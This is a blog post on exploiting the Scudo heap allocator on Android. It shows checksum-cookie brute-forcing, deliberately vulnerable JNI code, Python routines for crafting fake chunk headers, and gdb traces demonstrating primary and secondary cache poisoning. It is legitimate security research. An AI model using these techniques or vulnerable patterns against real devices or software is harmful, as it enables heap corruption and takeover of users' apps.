Binary Exploitation for Scudo Heap Allocator on Android

In this series of blog posts, we will investigate how an attacker may leverage the internals of the Scudo Allocator in order to obtain an advantage on an Android OS. To that end, necessary prerequisites will be discussed and analysed for their likelihood. The focus will primarily be on malloc and free , although realloc and other functions may also be of interest. According to source code , the Scudo version considered in this blog is 161cca266a9d0b6deb5f1fd2de8ad543649a7fa1.

If you have no idea about the fundamentals of Scudo, try reading the linked code! The followup blog post discusses timing side channel attacks on Scudo and requires some of the basics discussed in this post.

Necessary Assumptions

Up to this point, no “easy” way of bypassing the checks in the implementations of malloc and free has been found. Therefore it will be unavoidable to assume that certain events have happened already.

The key observation is that every chunk header is protected by a checksum, which is verified for every chunk that is passed to free via Chunk::loadHeader(Cookie, Ptr, &Header) . The computations performed when calculating the checksum are architecture - dependent. Therefore, we assume an Intel architecture, i.e. the checksum computation is based on the crc32 instruction.

The checksum depends on

  1. a random 32-bit value named Cookie
  2. a pointer to the user data. This pointer is pointing to the memory located right after the chunk header.
  3. the header of the chunk. The checksum is computed over the header with a zeroed - out checksum field.

Also, as Zygote forks itself when creating a new app, global variables of shared - object files that are already loaded into Zygote will remain constant until Zygote is restarted. A list of loaded shared - object files can be seen below:

$ readelf -d /proc/$(pidof zygote64)/exe | grep NEEDED
    0x0000000000000001 (NEEDED)             Shared library: []
    0x0000000000000001 (NEEDED)             Shared library: []
    0x0000000000000001 (NEEDED)             Shared library: []
    0x0000000000000001 (NEEDED)             Shared library: []
    0x0000000000000001 (NEEDED)             Shared library: []
    0x0000000000000001 (NEEDED)             Shared library: []
    0x0000000000000001 (NEEDED)             Shared library: []
    0x0000000000000001 (NEEDED)             Shared library: []
    0x0000000000000001 (NEEDED)             Shared library: []
    0x0000000000000001 (NEEDED)             Shared library: []
    0x0000000000000001 (NEEDED)             Shared library: []
    0x0000000000000001 (NEEDED)             Shared library: []
    0x0000000000000001 (NEEDED)             Shared library: []

$ cat /proc/$(pidof zygote64)/maps | grep
730eb404b000-730eb408f000 r--p 00000000 07:60 21    /apex/
730eb408f000-730eb411d000 r-xp 00043000 07:60 21    /apex/
730eb411d000-730eb4122000 r--p 000d0000 07:60 21    /apex/
730eb4122000-730eb4123000 rw-p 000d4000 07:60 21    /apex/

$ readelf -s /apex/ | grep -e " scudo_malloc"
    199: 000000000004a0f0    55 FUNC    LOCAL  DEFAULT   14 scudo_malloc

Thus, Scudo is implemented in Therefore it can be expected that the global variable SCUDO_ALLOCATOR , which is used to implement scudo_malloc and so on, is the same across all apps forked from Zygote. SCUDO_ALLOCATOR is nothing but an instance of scudo::Allocator , which contains the field named Cookie . Hence, the Allocator::Cookie field can be expected to be the same across all apps forked from Zygote.

So we need to get the cookie once (per system restart) and we will be able to exploit Scudo/Heap - related vulnerabilities as long as we know necessary pointers. Unless stated otherwise, in the following sections we will always assume that we are given sufficient leaks to compute correct checksums!

Classical Information Leak

Attacks on checksum computation are already out there, e.g. it has been possible to compute the Cookie from a pointer and header leak (the header contains a valid checksum!) by reformulating the checksum computation as a set of SMT equations . Unfortunately, comparing the implementation attacked with the implementation we are facing, we can observe that

  1. Intel uses a custom generator polynomial to implement crc32 (see Intel Manual Vol. 2). I.e. poly = 0x11EDC6F41 instead of the standardized 0x0104C11DB7 .
  2. Checksum computation in our cases applies an additional xor in order to reduce the checksum size.

It has not been possible to derive a lookup table for Intel’s crc32 implementation. If it had been successful, maybe the SMT attack would have worked. Other attacks involving symbolic execution (via klee based on this have also not been successful…). Still, there is another approach to go back to: brute - force!

Turns out that using a multi - threaded application to brute - force the Cookie overshot the goal. E.g., if we are given:

  1. pointer = 0x7bac6974fd30
  2. header = 0x20d2000000010101

brute - forcing the Cookie s.t. computeChecksum(Cookie, pointer, zeroed_header) == checksum(header) is true resulted in roughly 120155 candidates over the course of 3 seconds… running it for longer of course will yield more results:

$ head cookies.txt

Now one might argue that those cookie values are only valid for the above configuration. The funny thing is that at least some of them work for different configurations as well! This means that the pointer used to brute - force the cookie can be completely different from the pointer of our buffer! Of course neither every single value has been verified, nor is there a formal proof to why most of the above cookies work. Empirically speaking, e.g. 0x2a7e worked for crafting fake chunks etc. therefore bypassing the checksum verifications!

Unprivileged App

Due to the appification, one might argue that it nowadays is easier to execute an app on a targeted mobile device (assuming your average smartphone user) than it has been 10 years ago. Therefore, research regarding side channel attacks on mobile devices (e.g. see “An Insight into Android Side-Channel Attacks” for a rough overview on this topic) often assume that there is an unprivileged app already running on the targeted device.

Hence we could also assume that we can at least start an app on the target device. Notice that permissions for communication over the internet are normal permissions , i.e. they are specified in the android manifest file of an app and the user is only asked once per installation whether the permissions are fine or not. Therefore we may also assume that an app has almost arbitrary install - time permissions and can leak information via networking.

Adding to the pile, on Android every app is forked from a process named Zygote64 . Convince yourself that

  1. contains Scudo
  2. is loaded by Zygote64

Finally, there is only one instance of the allocator .

Concluding, every app not only has access to the canary used in every app, but also to the Cookie used in every app. Thus, an unprivileged app can easily leak the cookie, therefore leaving us with almost the same setting as the information leak . The only difference is that we do not have a pointer, which we need to compute the checksum.

Suitable JNI Code

As always, we will consider small example modules for damnvulnerableapp. These will not represent real - world applications, but rather contain obviously vulnerable code like free(attacker_controlled_buffer + 0x10).

From this point onwards, we will try to derive attacks that are applicable to bugs that involve calls to Scudo - related functions like free. These attacks will be of the form Proof of Concept, i.e. e.g. we will already be satisfied, if construction of fake chunks works, instead of achieving arbitrary code execution. The idea here is to get to a comparable point wrt. other heap implementations like dlmalloc .

Freeing Chunks that are not really Chunks

For this section and following subsections we will assume that the target app contains JNI code similar to:

uint8_t *buffer = malloc(0x10);
free(buffer + x); // x = 0x10(primary) or 0x40(secondary)

Disregarding the fact that no programmer would ever call free like this, there are always settings where the attention of a developer slips and comparable bugs occur. Also we could reinterpret this as calling free on an attacker - controlled pointer.

When calling free, internally scudo_free is executed, which will wind up to call deallocate . There are a few checks we need to pass in order to get to the storage parts of chunks of the allocator:

// [1] Check alignment of pointer provided to deallocate
if (UNLIKELY(!isAligned(reinterpret_cast<uptr>(Ptr), MinAlignment)))
    reportMisalignedPointer(AllocatorAction::Deallocating, Ptr);
// [2] Check the checksum of the header. If it is corrupted, the process will be aborted!
Chunk::loadHeader(Cookie, Ptr, &Header);

// [3] Verify that the chunk is not double - freed
if (UNLIKELY(Header.State != Chunk::State::Allocated))
    reportInvalidChunkState(AllocatorAction::Deallocating, Ptr);
// [4] Check that e.g. free is used for malloc'ed memory.
if (Options.get(OptionBit::DeallocTypeMismatch)) {
    if (UNLIKELY(Header.OriginOrWasZeroed != Origin)) {
        if (Header.OriginOrWasZeroed != Chunk::Origin::Memalign ||
              Origin != Chunk::Origin::Malloc)
            reportDeallocTypeMismatch(AllocatorAction::Deallocating, Ptr,
                                      Header.OriginOrWasZeroed, Origin);
// [5] Check the size of the chunk
const uptr Size = getSize(Ptr, &Header);
if (DeleteSize && Options.get(OptionBit::DeleteSizeMismatch)) {
    if (UNLIKELY(DeleteSize != Size))
        reportDeleteSizeMismatch(Ptr, DeleteSize, Size);

// [6] This does the actual freeing
quarantineOrDeallocateChunk(Options, TaggedPtr, &Header, Size);

From the call to deallocate in scudo_malloc and the function signature of deallocate , we can infer that [5] is not relevant:

INTERFACE WEAK void SCUDO_PREFIX(free)(void *ptr) {
  SCUDO_ALLOCATOR.deallocate(ptr, scudo::Chunk::Origin::Malloc);

NOINLINE void deallocate(void *Ptr, Chunk::Origin Origin, uptr DeleteSize = 0,
                          UNUSED uptr Alignment = MinAlignment) {...}

as DeleteSize defaults to 0! Therefore, as long as quarantineOrDeallocateChunk does not apply any more checks on the size, the size can be choosen arbitrarily, i.e. to our advantage.

In quarantineOrDeallocateChunk , there is a check that determines whether a chunk will be put into quarantine, i.e. its freeing will be hold back to avoid reuse - based attacks. The flag that represents this check is computed as follows:

// If the quarantine is disabled, the actual size of a chunk is 0 or larger
// than the maximum allowed, we return a chunk directly to the backend.
// This purposefully underflows for Size == 0.
const bool BypassQuarantine = !Quarantine.getCacheSize() ||
                              ((Size - 1) >= QuarantineMaxChunkSize) ||

Notice that the comment states that “This purposefully underflows for Size == 0”, making BypassQuarantine = true for Size = 0 :) Therefore, even if the quarantine was activated by default (which it is not! Notice that Quarantine.getCacheSize() = thread_local_quarantine_size_kb << 10, where thread_local_quarantine_size_kb = 0 ), we could bypass the quarantine by size = 0.

There are a few more interesting checks for the chunk (in the bypass branch):

void *BlockBegin = getBlockBegin(Ptr, &NewHeader);
const uptr ClassId = NewHeader.ClassId;
if (LIKELY(ClassId)) {
    TSD->Cache.deallocate(ClassId, BlockBegin);
} else {
    Secondary.deallocate(Options, BlockBegin);

static inline void *getBlockBegin(const void *Ptr,
                                  Chunk::UnpackedHeader *Header) {
  return reinterpret_cast<void *>(
      reinterpret_cast<uptr>(Ptr) - Chunk::getHeaderSize() -
      (static_cast<uptr>(Header->Offset) << MinAlignmentLog));

Observe that we control NewHeader.ClassId and Header->Offset (maybe Header->Offset can be used for memory probing ).

From this point onwards, we can distinguish attacks that use the primary or the secondary!

Primary Poisoning

If we want to get to Cache.deallocate, we will need NewHeader.ClassId > 0 to pass the check.

Investigating Cache.deallocate , which is the primary, reveals:

void deallocate(uptr ClassId, void *P) {
  CHECK_LT(ClassId, NumClasses);
  PerClass *C = &PerClassArray[ClassId];
  C->Chunks[C->Count++] =
      Allocator->compactPtr(ClassId, reinterpret_cast<uptr>(P));

Thus, if we get through all the checks, when Cache.deallocate is called, our fake chunk will be part of the list! One way to verify this is to create a JNI function of the form:

#define BUFFER_SIZE 0x20

static uint8_t called = 0;
static uint8_t *buffer = NULL;

JNIEXPORT jbyteArray JNICALL Java_com_damnvulnerableapp_vulnerable_modules_PoCPrimaryPoisoning_free(
        JNIEnv *env,
        jobject class,
        jbyteArray chunk) {

    // Leaks the pointer of a global buffer on first call.
    if (!called) {
        buffer = malloc(BUFFER_SIZE);   // enough memory to store full classid 1 chunk
        jbyteArray ar = (*env)->NewByteArray(env, 8);
        jbyte *leak = (jbyte*)&buffer;
        (*env)->SetByteArrayRegion(env, ar, 0, 8, leak);
        return ar;

    // Calls free(buffer + 0x10) and tries to avoid heap meta data overflows
    uint8_t *raw = (uint8_t*)(*env)->GetByteArrayElements(env, chunk, NULL);
    uint32_t length = (*env)->GetArrayLength(env, chunk);
    if (raw) {
        memcpy(buffer, raw, (length <= BUFFER_SIZE) ? length : BUFFER_SIZE);

        // Brings attacker - controlled chunk into primary
        free(buffer + 0x10); // combined header

        uint8_t *new = malloc(0x10);
        jbyteArray output = (*env)->NewByteArray(env, 0x10);
        (*env)->SetByteArrayRegion(env, output, 0, 0x10, new);
        return output;
    return NULL;

Then, an attacker could write the header first, then 8 bytes of padding, followed by e.g. a string “Hello World!”. Lets see that in action!

Lets say the first call to this function leaked pointer = 0x7bac7976f730 and say we somehow got a cookie from a previous leak or so, Cookie = 0x2a7e. Then we could use the following code to craft the fake header:

combined_header = unpacked_header()
combined_header.ClassId = 1 # Smallest allocation class --> primary, user_data_size=0x10
combined_header.State = 1   # = Allocated --> cannot free a free chunk
combined_header.SizeOrUnusedBytes = 0   # Bypass quarantine (actually irrelevant)
combined_header.OriginOrWasZeroed = 0   # = allocated via malloc
combined_header.Offset = 0  # chunk_start ~= usr_ptr - header_size - offset
combined_header.Checksum = utils.android_crc32(
    cookie, # 0x2a7e
    pointer + 0x10, # buffer = 0x7bac7976f730 => buffer + 0x10 fake user data
    combined_header.pack()  # u64 representation of this header, with checksum=0

With the above, the header looks like 0x75a5000000000101 (mind little - endian).

If we send combined_header.bytes() + p64(0) + b'Hello World! and set a breakpoint right before the call to free(buffer + 0x10), we get:

gef➤  i r rdi
    rdi            0x7bac7976f740      0x7bac7976f740
gef➤  x/4gx $rdi-0x10
    0x7bac7976f730:	0x75a5000000000101	0x0000000000000000
    0x7bac7976f740:	0x6f57206f6c6c6548	0x0000000021646c72

Notice that the leaked pointer is 0x7bac7976f730! So this looks promising! Stepping over free will either tell us that we messed up by aborting, or will work and thus our fake chunk is in the primary.

It seems to have worked! The next call is to malloc(0x10) (see that the actual chunk size will be 0x20, if malloc(0x10) is called, because header and padding are also stored). As combined_header.ClassId = 1, the chunk that we freed is part of the chunk array that is used to serve malloc(0x10) calls! Executing malloc(0x10) yields:

gef➤  i r edi
    edi            0x10                0x10
gef➤  ni
gef➤  i r rax
    rax            0x7bac7976f740      0x7bac7976f740
gef➤  x/s $rax
    0x7bac7976f740:	"Hello World!"

Remember that we called free(buffer + 0x10) = free(0x7bac7976f730 + 0x10) = free(0x7bac7976f740)!

Therefore, not only did we move a chunk of size 0x30 (includes header size 0x10; remember that buffer = malloc(BUFFER_SIZE = 0x20)) to the chunk array that contains chunks of size only 0x20. But we also served a “preinitialized” chunk. Notice that we basically performed two different things at the same time:

  1. Served an arbitrary chunk (we will soon see that this cannot be that arbitrary…)
  2. Preinitialized data. This is actually unexpected, but a nice feature :) Basically, this allows us to infer that Options.getFillContentsMode() = NoFill , which comes from setting the flags where zero_contents = false and pattern_fill_contents = false ! This will result in a check that determines what to do with the contents to evaluate to false.
Pitfalls and Challenges

The above primary poisoning seems to work perfectly, but I have not told you what assumptions lie in the dark…

Lets try to come up with a list of assumptions and constraints (ignoring the base assumption of availability of sufficient leaks and “classical” ones like that chunk addresses have to be aligned).

Thievish Threads

As multiple threads share the same allocator (even the same TSD, which contains a cache that represents the primary), another thread could snack our fake chunk just introduced into the primary. Therefore, primary poisoning is probabilistic!

Moreover the thread that runs the JNI function could be assigned another TSD , because the old one is overloaded, i.e. there are lots of threads using the same TSD. Again, we would never see our chunk again.

It looks like every thread could be assigned every TSD after sufficient execution time (further analysis is needed to fully prove this). This might be beneficial in some cases where we want to attack code that is running in another thread.

Multi - Threaded Chunk Liberation

The chunk array might be drained , because the amount of free chunks, represented by C->Count , exceeds an upper bound. E.g. C->MaxCount = 13 for class id 1, because we can distinguish the following cases for C->Count:

  1. C->Count = C->MaxCount / 2 . This stems from the fact that deallocate can create batches if the corresponding Chunks array is full. To be precise, this will trigger the execution of drain , where C->Count = C->MaxCount. Therefore the minimum Count = Min(C->MaxCount / 2, C->Count) in drain will evaluate to 0 < C->MaxCount / 2 < C->MaxCount. Finally, C->Count -= Count <=> C->Count = C->MaxCount - C->MaxCount / 2 = C->MaxCount / 2. Notice that C->MaxCount = 2 * TransferBatch::getMaxCached(Size) . As can be seen in the next step, for malloc(0x10), this will result in C->MaxCount = 2 * 13 = 26 => C->Count = 26 / 2 = 13.
  2. C->Count = MaxCount , i.e.:
    C->Count = MaxCount
            = TransferBatch::getMaxCached(Size)
            = Min(MaxNumCached, SizeClassMap::getMaxCachedHint(Size))
            = Min(13, Max(1U, Min(Config::MaxNumCachedHint, N)))
            = Min(13, Max(1U, Min(13, (1U << Config::MaxBytesCachedLog) / static_cast<u32>(Size))))
            = Min(13, Max(1U, Min(13, (1U << 13) / Classes[ClassId - 1])))
    where Classes :
    static constexpr u32 Classes[] = {
        0x00020, 0x00030, 0x00040, 0x00050, 0x00060, 0x00070, 0x00080, 0x00090,
        0x000a0, 0x000b0, 0x000c0, 0x000e0, 0x000f0, 0x00110, 0x00120, 0x00130,
        0x00150, 0x00160, 0x00170, 0x00190, 0x001d0, 0x00210, 0x00240, 0x002a0,
        0x00330, 0x00370, 0x003a0, 0x00400, 0x00430, 0x004a0, 0x00530, 0x00610,
        0x00730, 0x00840, 0x00910, 0x009c0, 0x00a60, 0x00b10, 0x00ca0, 0x00e00,
        0x00fb0, 0x01030, 0x01130, 0x011f0, 0x01490, 0x01650, 0x01930, 0x02010,
        0x02190, 0x02490, 0x02850, 0x02d50, 0x03010, 0x03210, 0x03c90, 0x04090,
        0x04510, 0x04810, 0x05c10, 0x06f10, 0x07310, 0x08010, 0x0c010, 0x10010,

So for a small allocation, i.e. for ClassId = 1, we get:

C->MaxCount = Min(13, Max(1U, Min(13, 0x2000 / 0x20)))
        = Min(13, Max(1U, Min(13, 256)))
        = Min(13, Max(1U, 13))
        = 13

Lets say we have C->Count = 13 and we introduce our fake chunk. Then, on execution of deallocate , we get that C->Count = C->MaxCount and therefore drain is called. By itself, this would not be an issue, because drain will only remove the oldest half of the chunks and move the other chunks to the front of the array. But what happens, if there is another thread that wants to free memory? Assuming that the thread performs C->MaxCount / 2 + 1 calls to deallocate, this will trigger drain again and therefore result in our chunk being pushed back onto a free list.

Fake Chunk Mispositioning

The fake chunk may be “at the wrong location”. To that end, notice that compacting a pointer is done as follows:

CompactPtrT compactPtr(uptr ClassId, uptr Ptr) {
    DCHECK_LE(ClassId, SizeClassMap::LargestClassId);
    return compactPtrInternal(getCompactPtrBaseByClassId(ClassId), Ptr);
uptr getCompactPtrBaseByClassId(uptr ClassId) {
    // If we are not compacting pointers, base everything off of 0.
    if (sizeof(CompactPtrT) == sizeof(uptr) && CompactPtrScale == 0)
        return 0;
    return getRegionInfo(ClassId)->RegionBeg;
static CompactPtrT compactPtrInternal(uptr Base, uptr Ptr) {
    return static_cast<CompactPtrT>((Ptr - Base) >> CompactPtrScale);

Basically, a pointer is compacted by subtracting the base address of the region that belongs to a specific class id (e.g. 1) from that pointer and right - shifting the resulting relative offset by some value (often 4 , which makes sense in terms of alignment).

When supplying an address from a different segment to free(addr + 0x10), we have to ensure that this address is bigger than the base address of the class the fake chunk “belongs” to. E.g. if we put a fake chunk on the stack, i.e. at 0x7babf2c25890 with a header of 0x2542000000000101, but the base of the region holding class id 1 chunks is 0x7bac69744000, then:

sub 0x7babf2c25890, 0x7bac69744000 = 0xfffffffff894e189 -> underflow

Notice that it is (most likely) an invariant that the base is always smaller than or equal to the address of the chunk to be freed. Therefore, this could be undefined behaviour! The bits 4 to 35 (inclusive) of 0xfffffffff894e189, i.e. 0xff894e18, will be stored in the Chunks array via (r15 = ptr to store):

   0x00007baef7fc106b <+523>:	sub    r15,QWORD PTR [rdx+rsi*1+0x60] # subtraction from above
   0x00007baef7fc1070 <+528>:	shr    r15,0x4
   0x00007baef7fc1074 <+532>:	lea    edx,[rax+0x1]
   0x00007baef7fc1077 <+535>:	mov    DWORD PTR [r14],edx
   0x00007baef7fc107a <+538>:	mov    eax,eax
   0x00007baef7fc107c <+540>:	mov    DWORD PTR [r14+rax*4+0x10],r15d

When malloc is called, then the following is executed (r14d = compacted pointer):

   0x00007baef7fbcba5 <+389>:	mov    r14d,DWORD PTR [rbx+rax*4+0x10]  # r14d = compacted pointer
   0x00007baef7fbcbaa <+394>:	add    QWORD PTR [r15+0xf88],rcx    # stats
   0x00007baef7fbcbb1 <+401>:	sub    QWORD PTR [r15+0xf90],rcx    # stats
   0x00007baef7fbcbb8 <+408>:	mov    rax,QWORD PTR [r15+0xfa0]
   0x00007baef7fbcbbf <+415>:	lea    rcx,[r12+r12*2]
   0x00007baef7fbcbc3 <+419>:	shl    rcx,0x6
   0x00007baef7fbcbc7 <+423>:	shl    r14,0x4
   0x00007baef7fbcbcb <+427>:	add    r14,QWORD PTR [rax+rcx*1+0x60]

Essentially, malloc gets rid of the sign that we would get from free if it was not for unsigned subtraction, i.e. from subtracting something big from something small. Then this value is interpreted as an unsigned integer and added to the base address of the chunk id. The following calculations might clarify that:

gef➤  p/x 0x7bac69744000 + 0xf86d04890      = base address + shifted compacted pointer
$16 = 0x7bbbf0448890                        = invalid address (reality)
gef➤  p/x 0x7bac69744000 + (int)0xf86d04890 = signed addition!
$17 = 0x7babf0448890                        = wanted address (stack)

malloc will return the (above malformed) chunk.

If the “malformation” is controllable, then this:

  1. can enable memory testing/probing? Not sure how to avoid SIGSEG though…
  2. can make arbitrary (accessible) memory regions available to an attacker, if the attacker has information about the process image…

With the above observations, we can infer that the least - significant 36 bits of an address that is supplied to free, with the property that this address is less than or equal to the base address of the region containing chunks with id 1, determine the value that is added to the base address. To be precise, only bits 4-35 (excluding bits 0, 1, 2, 3 and everything above 35) are relevant for the addition due to the right and left shifts. As in malloc the compacted pointer is shifted to the left by 4 and this shift operation is performed in a 64-bit register, this will result in the addend to be a multiple of 0x10, which matches the default alignment.

Long story short, if we provided a fake chunk to free with an address that is less than the base address of the region that belongs to the respective class id, then the next malloc will cause a segmentation fault with high probability.

Secondary Cache Poisoning

It is also possible to introduce fake chunks into the secondary. To that end, we have to assume that the secondary is using a cache. Lets see some already familiar code to clarify that:

if (LIKELY(ClassId)) {
    TSD->Cache.deallocate(ClassId, BlockBegin); // <-- primary free
} else {
    Secondary.deallocate(Options, BlockBegin);  // <-- secondary free

As we are interested in the secondary, we can focus on the implementation of Secondary::deallocate :

template <typename Config>
void MapAllocator<Config>::deallocate(Options Options, void *Ptr) {
    LargeBlock::Header *H = LargeBlock::getHeader<Config>(Ptr);
    const uptr CommitSize = H->CommitSize;
        ScopedLock L(Mutex);
        InUseBlocks.remove(H);  // doubly linked list remove (??unlink??); can abort
        FreedBytes += CommitSize;
        Stats.sub(StatAllocated, CommitSize);
        Stats.sub(StatMapped, H->MapSize);
    }, H);    // caching or munmap, if enabled; otherwise just munmap

First of all, InUseBlocks is a doubly linked list , which contains all allocated secondary chunks. Also, some cache object is used to “free” the chunk. Taking an attacker’s perspective, we assume that we can control the entire LargeBlock::Header :

  1. Prev and Next pointers that make the header a part of a doubly linked list.
  2. CommitBase. Actual starting point of the chunk. Most of the time CommitBase = MapBase + PageSize.
  3. CommitSize. Actual chunk size to be used. Most of the time CommitSize = 2 * PageSize + RequestedSize.
  4. MapBase. Used for munmap. What is really returned by mmap.
  5. MapSize. Used for munmap. What is really used when using mmap to allocate memory.
  6. Data. Actually sizeof (Data) = 0, so we can ignore this!

Now we can start to tamper around with some, if not all, of those fields.

Excursion to remove

Anyone, who is familiar with the unlink exploit , might now scream to investigate DoublyLinkedList::remove . As we have to pass through this method anyways, we can do a quick analysis:

// The consistency of the adjacent links is aggressively checked in order to
// catch potential corruption attempts, that could yield a mirrored
// write-{4,8} primitive. nullptr checks are deemed less vital.     <-- I think they know already :(
void remove(T *X) {
    T *Prev = X->Prev;
    T *Next = X->Next;
    if (Prev) {
        CHECK_EQ(Prev->Next, X);
        Prev->Next = Next;
    if (Next) {
        CHECK_EQ(Next->Prev, X);
        Next->Prev = Prev;
    if (First == X) {
        DCHECK_EQ(Prev, nullptr);
        First = Next;
    } else {
        DCHECK_NE(Prev, nullptr);
    if (Last == X) {
        DCHECK_EQ(Next, nullptr);
        Last = Prev;
    } else {
        DCHECK_NE(Next, nullptr);

Lets formulate two questions of interest:

  1. How can we abuse LargeBlock::Header::Next and LargeBlock::Header::Prev to get a Write - What - Where condition?
  2. How do we pass through this method without triggering an abort, i.e. without failing any of the assertions like CHECK_EQ(Prev->Next, X)?

Starting off easy, we can see that choosing X->Next = X->Prev = 0 will cause execution of DCHECK_NE(Prev, nullptr) and DCHECK_NE(Next, nullptr). Observe that X, i.e. our fake large header is not part of the list. Therefore First != X and Last != X!

Setting X->Next = buffer and X->Prev = 0 results in a call to CHECK_EQ(Next->Prev, X). Thus, our buffer has to contain a pointer that points back to X, which seems pretty unlikely, but still possible. Still, as First != X and X->Prev = 0 we abort due to DCHECK_NE(Prev, nullptr).

Finally, X->Next = buffer_0 and X->Prev = buffer_1 enforces buffer_0 and buffer_1 to contain pointers that point back to X.

A trivial way of passing this function is to choose X->Next = X->Prev = X. This ensures that X->Next and X->Prev always point back to X with non - zero pointers. Notice that this requires that we know the address of X! If this is the case, then DoublyLinkedList::remove behaves almost like a nop, with the side effect that Size -= 1 per call. (see future work for more)

Also notice that Prev->Next and Next->Prev will only be overwritten, if they point back to X. As X is most likely not part of the InUseBlocks list, this implies that we can already write to those locations or we can only write to locations that point back to our buffer. Thus, a Write - What - Where condition seems impossible on first analysis.

Introducing Fake Chunks to Secondary

The AndroidConfig defines the SecondaryCache to be of type MapAllocatorCache . Therefore, there is another caching layer to be bypassed / abused.

If cannot cache the chunk that is currently freed, then the chunk will just be unmapped using munmap.

If we passed the canCache check, it should be possible to craft fake chunks for the secondary as well, because of the caching mechanism. To that end, assuming that canCache(H->CommitSize) == true, we end up in the following code

if (Config::SecondaryCacheQuarantineSize &&
    useMemoryTagging<Config>(Options)) {
    QuarantinePos =
        (QuarantinePos + 1) % Max(Config::SecondaryCacheQuarantineSize, 1u);
[1]    if (!Quarantine[QuarantinePos].CommitBase) {
        Quarantine[QuarantinePos] = Entry;
[2]    CachedBlock PrevEntry = Quarantine[QuarantinePos];
    Quarantine[QuarantinePos] = Entry;
    if (OldestTime == 0)
        OldestTime = Entry.Time;
    Entry = PrevEntry;
if (EntriesCount >= MaxCount) {
    if (IsFullEvents++ == 4U)
        EmptyCache = true;
} else {
[3]    for (u32 I = 0; I < MaxCount; I++) {
        if (Entries[I].CommitBase)
        if (I != 0)
            Entries[I] = Entries[0];
        Entries[0] = Entry;
        if (OldestTime == 0)
            OldestTime = Entry.Time;
        EntryCached = true;

Thus there are three interesting paths of execution:

  1. No quarantine, i.e. we only run [3], which results in our chunks being placed in the cache!
  2. Non - full Quarantine, i.e. we run [1]. This will place our entry in the quarantine, but not in the cache! Eventually, the chunk will be cached, but it requires a full cycle of QuarantinePos for that to happen in this function (maybe there is another function that also increments QuarantinePos).
  3. Full Quarantine, i.e. we run [2]. Therefore, if the quarantine is filled with entries, this function will fetch the next entry from the quarantine, put our chunk into the quarantine and cache the fetched entry.

A trivial attack for that is to fill the quarantine by calling scudo_free on a crafted large chunk that passes all the checks. Then, after at most Max(Config::SecondaryCacheQuarantineSize, 1u) + 1 many calls we are guaranteed to have our chunk cached. Afterwards, when calling MapAllocator::allocate , this will result in Cache::retrieve returning the first non - null cache entry, which is, with high probability (ignoring multi-threaded access), our fake chunk. This is similar to crafting a fake chunk with the primary , although we should not be limited by decompacting a pointer .

It does not seem like there is memory tagging enabled on my system. Therefore, there is no need to bypass the quarantine with the above attack…the fake chunk can be added to the cache directly.

Lets try to craft a fake chunk for the secondary. To that end, lets assume we have the following setup:

#define BUFFER_SIZE 0x100
uint8_t buffer[BUFFER_SIZE] = { 0 };
if (!called) {
    jbyteArray ar = (*env)->NewByteArray(env, 8);
    jbyte *leak = (jbyte*)&buffer;
    (*env)->SetByteArrayRegion(env, ar, 0, 8, &leak);
    return ar;

uint8_t *raw = (uint8_t*)(*env)->GetByteArrayElements(env, chunk, NULL);
uint32_t length = (*env)->GetArrayLength(env, chunk);
if (raw) {
    memcpy(buffer, raw, (length <= BUFFER_SIZE) ? length : BUFFER_SIZE);

    // Brings attacker - controlled chunk into secondary cache
    free(buffer + 0x30 + 0x10); // large header + combined header

    // Triggers potential write - what - where condition. This could also be triggered by another
    // thread, although it might be problematic what that thread will write and how much...
    uint8_t *write_trigger = malloc(length - 0x40);
    memcpy(write_trigger, raw + 0x40, length - 0x40);
return NULL;

On first execution of the above code snippet, the address of buffer = 0x7babf29407b0 will be leaked. For any other execution, we will try to call free(buffer + 0x30 + 0x10) and malloc(length - 0x40). Notice that length will be the length of the whole chunk including the headers. When calling malloc we have to provide the size of the user data that does not include the headers!

Setting a breakpoint right before free yields:

gef➤  i r rdi
    rdi            0x7babf29407f0      0x7babf29407f0
gef➤  x/8gx $rdi-0x40
    0x7babf29407b0:	0x00007babf29407b0	0x00007babf29407b0  <--
    0x7babf29407c0:	0x00007babf29407f0	0x0000000000080040    |-- large header
    0x7babf29407d0:	0xffffffffffffffff	0xffffffffffffffff  <--
    0x7babf29407e0:	0xd82d000000000100	0x0000000000000000  <-- combined header + 8 bytes padding

Again, if we pass all the checks, i.e. provided a correct large chunk, then the app will not abort and not cause a segfault. Also observe that the LargeBlock::Header::Prev and LargeBlock::Header::Next both point to the beginning of LargeBlock::Header. This is because the header has to pass InUseChunks.remove(H).

The header could be crafted in the following way:

# Craft large header
lhdr = large_header()
lhdr.Prev = pointer # ensure that DoublyLinkedList::remove is nop
lhdr.Next = pointer
lhdr.CommitBase = pointer + 0x30 + 0x10 # pointer to user data
lhdr.CommitSize = 0x400 * 0x200 + 0x40 # data + headers
lhdr.MapBase = 0xffffffffffffffff   # irrelevant; for debugging reasons set to -1
lhdr.MapSize = 0xffffffffffffffff   # irrelevant; for debugging reasons set to -1

# Combined header
combined_header = unpacked_header()
combined_header.ClassId = 0 # Secondary allocations have class id 0
combined_header.State = 1   # = allocated
combined_header.SizeOrUnusedBytes = 0   # irrelevant
combined_header.OriginOrWasZeroed = 0   # = malloc'ed chunk
combined_header.Offset = 0  # irrelevant (for now)
combined_header.Checksum = utils.android_crc32(
    pointer + 0x30 + 0x10,  # user data pointer: sizeof (LargeBlock::Header) = 0x30, sizeof (Chunk::UnpackedHeader) = 0x8, 8 bytes padding -> 0x40

# Send chunk
data = b'\x42' * 0x400 * 0x200 # 512KiB to trigger secondary allocation
io.forward(lhdr.bytes() + combined_header.bytes() + p64(0) + data)

Notice that canCache imposes an upper bound on LargeBlock::Header::CommitSize, which is 2 << 20 . Observe that there is no lower bound to LargeBlock::Header::CommitSize that restricts us from introducing a fake chunk into the cache (see later for more on a lower bound)! (see future work for an attack idea that abuses the fact that malloc calls do not have any control over the size field. This implies that allocations that are in size range of the primary will be taken from the primary. Setting fake.CommitSize <= <max primary allocation size> will result in a dead cache entry, because it will be smaller than any requested size allocated by the secondary assuming that the primary did not fail to allocate)

Right before calling malloc(buffer + 0x40) we have:

gef  i r rdi
    rdi            0x80000             0x80000
gef  ni
gef  i r rax
    rax            0x7babf2940830      0x7babf2940830
gef  x/8gx $rax-0x40
    0x7babf29407f0:	0x00007bac40c76fc0	0x0000000000000000
    0x7babf2940800:	0x00007babf29407f0	0x0000000000080040
    0x7babf2940810:	0xffffffffffffffff	0xffffffffffffffff
    0x7babf2940820:	0x216a000000000100	0x4242424242424242

